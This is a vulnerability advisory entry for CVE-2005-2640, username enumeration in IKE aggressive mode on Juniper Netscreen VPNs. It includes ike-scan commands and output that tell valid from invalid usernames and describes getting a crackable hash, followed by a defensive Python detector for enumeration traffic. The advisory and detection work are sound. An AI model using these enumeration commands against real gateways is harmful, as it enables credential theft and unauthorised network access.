Juniper Netscreen VPN Username Enumeration Vulnerability

Vulnerability ID: 1109012      Vulnerability type: Design error
Published: 2005-08-18          Updated: 2007-02-19
CVE: CVE-2005-2640             CNNVD ID: CNNVD-200508-259
Platform: Hardware             CVSS score: 5.0
|Vulnerability source
https://www.exploit-db.com/exploits/26168
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200508-259
|Vulnerability details
Netscreen is one of a series of leading networking and security products offered by Juniper. The Juniper Netscreen integrated firewall/VPN products contain a VPN username enumeration vulnerability, found while performing VPN security testing for a customer; an attacker who successfully exploits it can gain access to network resources protected by the VPN. An attacker can use a dictionary attack to determine which VPN usernames are valid on the Netscreen. Once a username has been discovered, the attacker can use it to obtain a hash from the Netscreen and then crack it offline to determine the associated password.
|Exploit
source: http://www.securityfocus.com/bid/14595/info

The Juniper Netscreen VPN implementation will identify valid usernames in IKE aggressive mode when pre-shared key authentication is used. This allows attackers to obtain a list of valid VPN users. With a valid username, an attacker can obtain hashed credentials against which a brute force attack may be performed. A successful crack would mean that the attacker has complete access to the network.

The ike-scan options used in this example are:

-A           Specify IKE Aggressive Mode. The default for ike-scan is Main Mode.
-M           Multiline: display each payload on a separate line, which makes the output easier to read.
--id=string  Specify the string to be used for the ID payload.
10.0.0.1     The IP address of the target Netscreen.

3.1. Response to valid username "royhills@hotmail.com"

$ ike-scan -A -M --id=royhills@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)
10.0.0.1 Aggressive Mode Handshake returned
HDR=(CKY-R=21af4dbe2cecd5f0)
SA=(Enc=3DES Hash=SHA1 Group=2:modp1024 Auth=PSK LifeType=Seconds
LifeDuration=28800)
VID=64405f46f03b7660a23be116a1975058e69e83870000000400000403
(Netscreen-05)
VID=4865617274426561745f4e6f74696679386b0100 (Heartbeat Notify)
KeyExchange(128 bytes)
Nonce(20 bytes)
ID(Type=ID_IPV4_ADDR, Value=10.0.0.1)
Hash(20 bytes)

Ending ike-scan 1.7.7: 1 hosts scanned in 0.136 seconds (7.37 hosts/sec). 1
returned handshake; 0 returned notify

3.2. Response to invalid username "invalid@hotmail.com"

$ ike-scan -A -M --id=invalid@hotmail.com 10.0.0.1
Starting ike-scan 1.7.7 with 1 hosts (http://www.nta-monitor.com/ike-scan/)

Ending ike-scan 1.7.7: 1 hosts scanned in 2.467 seconds (0.41 hosts/sec). 0
returned handshake; 0 returned notify
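The two runs above differ only in whether the gateway answers the aggressive-mode proposal, so the traffic an enumeration attempt leaves behind is one source sending many aggressive-mode first messages, each carrying a different ID payload. The following added example (not part of the original advisory or of ike-scan) parses the ISAKMP header and payload chain to pull the identity out of aggressive-mode messages and flags sources that have offered more distinct identities than any real client would; the packets, addresses and threshold are constructed for the demonstration.

```python
import struct
from collections import defaultdict

ISAKMP_HDR = struct.Struct("!8s8sBBBBII")  # cookies, next payload, version, exchange, flags, msgid, length
XCHG_MAIN, XCHG_AGGRESSIVE = 2, 4         # IKEv1 exchange types: Identity Protection (Main), Aggressive
PAYLOAD_SA, PAYLOAD_ID = 1, 5              # ISAKMP payload types used below
ID_USER_FQDN = 3                           # identity form "user@example.com", as in the ike-scan runs

def build_aggressive_msg(identity: bytes, xchg: int = XCHG_AGGRESSIVE) -> bytes:
    """Constructed sample (not a capture): header + placeholder SA payload + ID payload, the shape of message 1."""
    sa_body = b"\x00" * 8                                              # SA contents do not matter here
    sa = struct.pack("!BBH", PAYLOAD_ID, 0, 4 + len(sa_body)) + sa_body  # next payload = ID
    id_body = struct.pack("!BBH", ID_USER_FQDN, 17, 500) + identity    # ID type, protocol UDP, port 500
    idp = struct.pack("!BBH", 0, 0, 4 + len(id_body)) + id_body        # next payload = none
    body = sa + idp
    hdr = ISAKMP_HDR.pack(b"\x01" * 8, b"\x00" * 8, PAYLOAD_SA, 0x10, xchg, 0, 0, ISAKMP_HDR.size + len(body))
    return hdr + body

def aggressive_mode_identity(pkt: bytes):
    """Return (id_type, identity) from the ID payload of an aggressive-mode message; None for main mode or malformed input."""
    if len(pkt) < ISAKMP_HDR.size:
        return None
    _, _, nxt, _, xchg, _, _, _ = ISAKMP_HDR.unpack_from(pkt)
    if xchg != XCHG_AGGRESSIVE:
        return None
    off = ISAKMP_HDR.size
    while nxt and off + 4 <= len(pkt):                 # walk the payload chain
        ptype = nxt
        nxt, _, plen = struct.unpack_from("!BBH", pkt, off)
        if plen < 4 or off + plen > len(pkt):          # bogus length: stop rather than over-read
            return None
        if ptype == PAYLOAD_ID and plen >= 8:
            return pkt[off + 4], pkt[off + 8:off + plen]
        off += plen
    return None

def enumeration_sources(events, threshold=5):
    """events: iterable of (src_ip, raw ISAKMP packet). Flag sources offering more than
    `threshold` distinct identities in aggressive mode (a real client presents one)."""
    seen = defaultdict(set)
    for src, pkt in events:
        found = aggressive_mode_identity(pkt)
        if found is not None:
            seen[src].add(found[1])
    return {src: len(ids) for src, ids in seen.items() if len(ids) > threshold}

# Constructed sample traffic: one host cycling through eight identities, one legitimate client.
SAMPLE_EVENTS = [("198.51.100.7", build_aggressive_msg(b"user%d@example.com" % i)) for i in range(8)]
SAMPLE_EVENTS.append(("192.0.2.9", build_aggressive_msg(b"vpnuser@example.com")))
SAMPLE_EVENTS.append(("192.0.2.9", build_aggressive_msg(b"vpnuser@example.com", xchg=XCHG_MAIN)))
```

On a real sensor the same logic runs over UDP/500 payloads; the threshold should be set from observed client behaviour, and a gateway that does not use aggressive mode at all can alert on any such message.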
|References

Source: BID
Name: 14595
Link: http://www.securityfocus.com/bid/14595
Source: MISC
Link: http://www.nta-monitor.com/news/vpn-flaws/juniper/netscreen/index.htm
Source: SECTRACK
Name: 1014728
Link: http://securitytracker.com/id?1014728
Source: SECUNIA
Name: 16474
Link: http://secunia.com/advisories/16474/
Source: BUGTRAQ
Name: 20050818 Juniper Netscreen VPN Username Enumeration Vulnerability
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=112438068426034&w=2